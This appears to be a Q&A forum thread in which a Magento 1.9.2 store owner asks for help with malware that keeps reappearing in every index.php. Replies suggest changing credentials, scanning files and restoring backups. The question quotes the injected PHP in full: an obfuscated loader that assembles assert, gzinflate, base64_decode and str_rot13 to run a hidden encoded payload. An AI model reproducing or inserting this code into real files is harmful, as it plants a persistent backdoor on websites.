# I found some malicious code in all index.php of magento 1.9.2

Tags: magento-1.9, security

Need help to stop malicious code in all `index.php` file

Once I remove malicious code from `index.php` then again its apperar in index.php files

malicious  code like --

`$swvJgN7="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";$xnDU7="Fl1YmASDIlxhY/AX9mB3Ipa0mNtC9j411LNWnIdeERLMB";$XYD8Jw="\x61";$UbK0prw="\x73\x74";$aIYkAW="\147\172\151";$iIhWWKU5="\142\x61\x73";$XYD8Jw.="\x73";$iIhWWKU5.="\x65\66\x34";$aIYkAW.="\156\x66";$xnDU7.="5pT2FbcJngH5YzRzgfdrHFxM1pdJnsyS2zbhWxJrtHn2u";$UbK0prw.="\162\137\x72";$UbK0prw.="\x6f\164";$iIhWWKU5.="\x5f\144\145\143";$xnDU7.="cLD1x2uuMzMwPBgeLzIYhroKWTxHM+HDep5TvbzywABYN";$aIYkAW.="\154\141";$XYD8Jw.="\163\145";$iIhWWKU5.="\157\x64\x65";$UbK0prw.="\61\x33";$xnDU7.="j2TlLbXcceXnzgHZdlUxdvM6E2L7uTyPGtBYdzgLN";$XYD8Jw.="\x72\164";$aIYkAW.="\x74\x65";@$XYD8Jw($aIYkAW($iIhWWKU5($UbK0prw($xnDU7))));`

Comment: Every 3 months you should change your password, use https://www.magereport.com/ and check your website security, use CDN.

Comment: please check third party module & ask your hosting provider to scan your directories for malware scan. and asap change your hosting & ftp credential.

Comment: hello did you find out the name of malware and how to remove it, im facing the same issue

Comment: @YehiaA.Salam which hosting are you using?

Answer (score 0):

Hey i think your FTP account has been compromised so that's why it keep malicious code appending in your index file so i would suggest you to change your ftp credential and scan your directory and files for more information you can check [this](https://stackoverflow.com/questions/10347139/why-does-this-malicious-code-keep-appending-to-my-index-php-file) link.

Comment: we have already changed FTP account .and other issue is index.php getting update but updated time stamp of file is same as old .dont know how it can happend

Comment: it might be happening because  any kind of malicious script is still running or in other words your files are infected.Can you check your server logs is there anything unusual log?

Comment: nothing found in server logs .even server gyus said there are no issue with server

Comment: then i would suggest you to scan your files or project because as far as i know it infected your file and you need to get rid of this else it generate again and again  you can use https://www.magereport.com/ this site to check hope this help.

Comment: I have done everthing but nothing found

Comment: can you share procedure how did you scan your files?

Comment: not able to find that script.but we change in index.php file.malicious code came at same line and below some commented text.We remove that text.

Answer (score 0):

If possible Restore your code before this edit date, Else ask your hosting to scan your site against any software for this and highlight infected files to you. 
Then manually remove this code from all of these files. After that set proper permissions and change all account PWs.

Comment: no help from the above solution